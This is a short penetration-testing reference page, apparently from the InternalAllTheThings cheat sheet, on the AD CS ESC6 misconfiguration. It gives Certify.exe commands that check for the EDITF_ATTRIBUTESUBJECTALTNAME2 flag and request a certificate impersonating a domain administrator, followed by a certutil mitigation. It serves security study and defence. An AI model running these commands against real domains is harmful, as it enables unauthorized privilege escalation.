ad-adcs-esc06.md (1401B)
1 --- 2 title: "Active Directory - Certificate ESC6" 3 section: "Active Directory" 4 sectionSlug: "active-directory" 5 sourcePath: "docs/active-directory/ad-adcs-esc06.md" 6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/ad-adcs-esc06.md" 7 sha: "203bb0c0b290" 8 isIndex: false 9 --- 10 11 # Active Directory - Certificate ESC6 12 13 ## ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2 14 15 > If this flag is set on the CA, any request (including when the subject is built from Active Directory) can have user defined values in the subject alternative name. 16 17 **Exploitation** 18 19 * Use [Certify.exe](https://github.com/GhostPack/Certify) to check for **UserSpecifiedSAN** flag state which refers to the `EDITF_ATTRIBUTESUBJECTALTNAME2` flag. 20 21 ```ps1 22 Certify.exe cas 23 ``` 24 25 * Request a certificate for a template and add an altname, even though the default `User` template doesn't normally allow to specify alternative names 26 27 ```ps1 28 .\Certify.exe request /ca:dc.domain.local\domain-DC-CA /template:User /altname:DomAdmin 29 ``` 30 31 **Mitigation** 32 33 * Remove the flag: `certutil.exe -config "CA01.domain.local\CA01" -setreg "policy\EditFlags" -EDITF_ATTRIBUTESUBJECTALTNAME2` 34 35 ## References 36 37 * [AD CS: from ManageCA to RCE - February 11, 2022 - Pablo Martínez, Kurosh Dabbagh](https://web.archive.org/web/20220212053945/http://www.blackarrow.net/ad-cs-from-manageca-to-rce//)